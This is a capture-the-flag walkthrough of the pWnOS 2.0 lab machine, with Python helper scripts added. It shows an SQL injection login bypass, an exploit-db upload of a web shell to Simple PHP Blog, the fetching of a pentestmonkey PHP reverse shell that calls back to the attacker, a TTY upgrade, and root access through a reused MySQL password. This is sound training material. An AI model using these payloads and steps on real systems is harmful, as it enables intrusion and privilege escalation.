About pWnOS 2.0 (Pre-Release)
This virtual machine required some initial configuration in VMware. It has already been assigned the static IP 10.10.10.100, so the attacking machine had to be placed on the same /24 network to reach it. I will not go through the setup, but keep that in mind if you are trying to work on this machine. While this is an easy machine I had fun doing it; I also kept overthinking the last part instead of trying the simplest things first.
This machine has more than one way to get access. My approach was to enumerate the web service, discover a blog, and enumerate the blog further to find a version number to search for exploits. After gaining a low-privilege shell as www-data, I escalated my privileges to root by reusing credentials belonging to MySQL.
Scanning and Enumeration
Running a full TCP scan with nmap returns only two open ports: SSH and an HTTP service.
Opening a browser and navigating to the HTTP service displays a page with a welcome message for an internal website.
Among the options on the right side of the page there is a Login link, and trying it seemed worthwhile.
The login page is very simple, so I thought it would be worth trying a common SQL injection to bypass authentication. Instead of an email address I typed the following:
test' or 1=1 -- -
and then typed anything as the password. This bypassed authentication, and the page showed me an email address.
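To show why that payload works, here is an added example (not code from the walkthrough or from Simple PHP Blog) that rebuilds the login check against an in-memory SQLite table. The user row is constructed for the demo with a made-up address; the real application stores password hashes rather than plaintext, but that makes no difference here because the injected comment removes the password clause from the query altogether. The same check with bound parameters treats the payload as an ordinary (non-matching) email string.

```python
import sqlite3

# The payload typed into the email field on the login page.
PAYLOAD = "test' or 1=1 -- -"

# Constructed sample data (hypothetical address, not the target's real user).
USERS = [("dan@example.invalid", "s3cret")]


def make_db():
    """Create an in-memory SQLite database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_query(email, password):
    """The injectable form: untrusted input spliced straight into the SQL text."""
    return "SELECT email FROM users WHERE email='%s' AND password='%s'" % (email, password)


def login_vulnerable(conn, email, password):
    """Login check the way a vulnerable PHP app does it (string concatenation).

    With PAYLOAD as the email the query becomes
        SELECT email FROM users WHERE email='test' or 1=1 -- -' AND password='...'
    `--` starts an SQL comment, so the password clause disappears, and
    `or 1=1` makes the WHERE clause true for every row: the first user in
    the table is "logged in".
    """
    row = conn.execute(build_vulnerable_query(email, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Same check with bound parameters: the payload is compared as a literal
    email string, matches nothing, and the login fails."""
    row = conn.execute(
        "SELECT email FROM users WHERE email=? AND password=?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))
```

The trailing ` -` after `--` is there because MySQL only treats `--` as a comment when it is followed by whitespace, and some forms and clients trim a trailing space; the extra `-` keeps the space in place.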
Unfortunately the page just kept saying “Logging in…” with nothing else of interest (after rooting the machine I realised I could have had remote code execution at this point). Instead of trying other SQL injection techniques I enumerated the web service further with gobuster. This is the command I used:
gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -x php,txt
These are the results that I obtained from gobuster:
Navigating to the blog directory displays a different page with a post and another link to log in.
From here I thought it would be a good idea to enumerate the blog further. Once again I used gobuster to enumerate directories and files with php and txt extensions, this time starting from the blog directory:
gobuster dir -u http://10.10.10.100/blog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -x php,txt
These are the results:
There were many more results this time, but after trying the most interesting ones I navigated to /blog/docs and found some files that gave me a little more information.
Opening TODO.TXT shows information about Simple PHP Blog: version numbers and tasks that were still to be done. Scrolling to the end reveals what could be the version running on the target, 0.4.x.
At this point I had a name for the software running the blog and a possible version of 0.4.x. A Google search for exploits for Simple PHP Blog 0.4 led me to https://www.exploit-db.com/exploits/1191. The exploit is a Perl script that covers multiple vulnerabilities in Simple PHP Blog; the one most interesting to me was the file upload vulnerability via POST. The script uploads a web shell to the images directory, which can then be used to execute commands. I ran the Perl script as follows:
perl exploit.pl -h http://10.10.10.100/blog -e 1
The “-e 1” switch tells the script to use the upload method and upload a web shell.
Once the script has run, the web shell is reachable under /blog/images as cmd.php, and from there I was able to execute commands.
To get a reverse shell instead of executing commands from the browser, I uploaded the PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
I only edited the file to set my IP address and port 443. After those small changes I hosted the PHP reverse shell from my attacking machine on port 80 using Python:
python -m SimpleHTTPServer 80
I then used wget from the web shell to download the reverse shell into the same images directory. (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80.)
With netcat listening on port 443, I navigated to php-reverse-shell.php under /blog/images in the browser and got a reverse shell as the www-data user.
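The only edit the reverse shell needs is the callback address, and a mismatch between that edit and the listener is the usual reason the callback never arrives. The following is an added example, not code from the walkthrough or from pentestmonkey, that makes the edit and verifies it before the file is served. It assumes the two `// CHANGE THIS` marker lines pentestmonkey's script ships with; the sample text below is a constructed stand-in for the real file, and 10.10.10.1 is a made-up attacker address.

```python
import ipaddress
import re

# The two marker lines as they appear in pentestmonkey's php-reverse-shell.php.
IP_LINE = re.compile(r"^\$ip = '[^']*';(.*)$", re.M)
PORT_LINE = re.compile(r"^\$port = \d+;(.*)$", re.M)


def set_shell_target(source, ip, port):
    """Return the script text with $ip and $port pointed at the attacker.

    Raises ValueError if the address is not a valid IP, the port is out of
    range, or the text does not contain exactly one of each marker line
    (i.e. it is not the script this edit expects).
    """
    ipaddress.ip_address(ip)  # raises ValueError on junk
    port = int(port)
    if not 1 <= port <= 65535:
        raise ValueError("port out of range: %r" % port)
    new, n_ip = IP_LINE.subn(lambda m: "$ip = '%s';%s" % (ip, m.group(1)), source)
    new, n_port = PORT_LINE.subn(lambda m: "$port = %d;%s" % (port, m.group(1)), new)
    if n_ip != 1 or n_port != 1:
        raise ValueError("expected one $ip and one $port line, found %d/%d" % (n_ip, n_port))
    return new


def shell_target(source):
    """Return (ip, port) currently configured in the script, or None."""
    m_ip = re.search(r"^\$ip = '([^']*)';", source, re.M)
    m_port = re.search(r"^\$port = (\d+);", source, re.M)
    if not (m_ip and m_port):
        return None
    return m_ip.group(1), int(m_port.group(1))


# Constructed stand-in for the real file: the two marker lines with the
# script's default values plus an unrelated line that must survive untouched.
SAMPLE_SHELL = (
    "<?php\n"
    "$ip = '127.0.0.1';  // CHANGE THIS\n"
    "$port = 1234;       // CHANGE THIS\n"
    "$chunk_size = 1400;\n"
)

if __name__ == "__main__":
    patched = set_shell_target(SAMPLE_SHELL, "10.10.10.1", 443)
    print(patched)
    print(shell_target(patched))  # ('10.10.10.1', 443)
    # From here the walkthrough's steps apply: serve the patched file with
    # `python -m SimpleHTTPServer 80` (Python 2; `python3 -m http.server 80`
    # on Python 3), start a netcat listener on 443, wget the file from the
    # web shell, and browse to it under /blog/images.
```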
To get a little more practice I decided to upgrade my netcat session to a fully interactive shell. I backgrounded the session with Ctrl+Z and then examined my own terminal with echo and stty to learn its type and size:
Keeping that information in mind, the next step was to put my local terminal into raw mode and turn local echo off, so that keystrokes such as Ctrl+C and Tab are passed straight through to the remote shell (note that -echo disables local echo; the remote pty echoes instead, which avoids doubled characters):
stty raw -echo
After this the terminal appears broken and does not display anything that is typed. In that state I typed fg to foreground the netcat session and then reset to get a usable shell back. Using the size I had obtained earlier from stty, I then matched the remote terminal to my own:
stty rows 53 columns 235
By now I had a fully interactive shell (things like Tab completion work).
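The rows and columns in that last stty line are the attacker's own terminal size, and getting them wrong leaves full-screen programs such as vi or less drawing garbage in the reverse shell. As an added helper, not part of the walkthrough, the following reads `stty -a` output from the attacker's terminal and produces the line to paste into the remote shell, handling both the Linux layout (`rows 53; columns 235;`) and the BSD/macOS layout (`53 rows; 235 columns;`). The sample strings are constructed; the walkthrough does not say which command it used to spawn the pty, so the python one-liner listed in `upgrade_steps` is an assumption.

```python
import re
import subprocess
import sys

# Constructed samples of the first lines `stty -a` prints on each platform
# (the size values are the ones used in the walkthrough).
SAMPLE_LINUX = "speed 38400 baud; rows 53; columns 235; line = 0;\n-brkint -imaxbel iutf8\n"
SAMPLE_BSD = "speed 9600 baud; 53 rows; 235 columns;\nlflags: icanon isig iexten echo\n"

_LINUX = re.compile(r"\brows (\d+);.*?\bcolumns (\d+);")
_BSD = re.compile(r"\b(\d+) rows;.*?\b(\d+) columns;")


def parse_stty_size(text):
    """Return (rows, columns) from `stty -a` output, or None if absent."""
    for pat in (_LINUX, _BSD):
        m = pat.search(text)
        if m:
            return int(m.group(1)), int(m.group(2))
    return None


def fixup_command(text):
    """The stty line to run inside the reverse shell once it has a pty."""
    size = parse_stty_size(text)
    if size is None:
        raise ValueError("no rows/columns found in stty output")
    return "stty rows %d columns %d" % size


def upgrade_steps(text):
    """The whole sequence, with the size line filled in from `text`.

    Step 1 is an assumption: the walkthrough does not name the command it
    used to get a pty; the python pty one-liner is the usual choice.
    """
    return [
        ("remote", "python -c 'import pty; pty.spawn(\"/bin/bash\")'"),
        ("local", "Ctrl+Z"),
        ("local", "stty raw -echo; fg"),
        ("remote", "reset"),
        ("remote", fixup_command(text)),
    ]


if __name__ == "__main__":
    if sys.stdin.isatty():
        # Run interactively on the attacker's box: read the real terminal.
        out = subprocess.run(["stty", "-a"], capture_output=True, text=True).stdout
    else:
        out = SAMPLE_LINUX
    for side, cmd in upgrade_steps(out):
        print("%-6s %s" % (side, cmd))
```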
For privilege escalation, looking around the file system I found MySQL credentials in mysqli_connect.php under the var directory.
Connecting to MySQL with those credentials reveals the web application's users in the ch16 database (test is a user I had created).
A quick Google search for the hash of Dan's password turned up the plaintext: killerbeesareflying
That password did not let me log in as the Dan user. However, the password I had found for MySQL did: using it with su I was able to become root, a straightforward case of password reuse between the database account and root.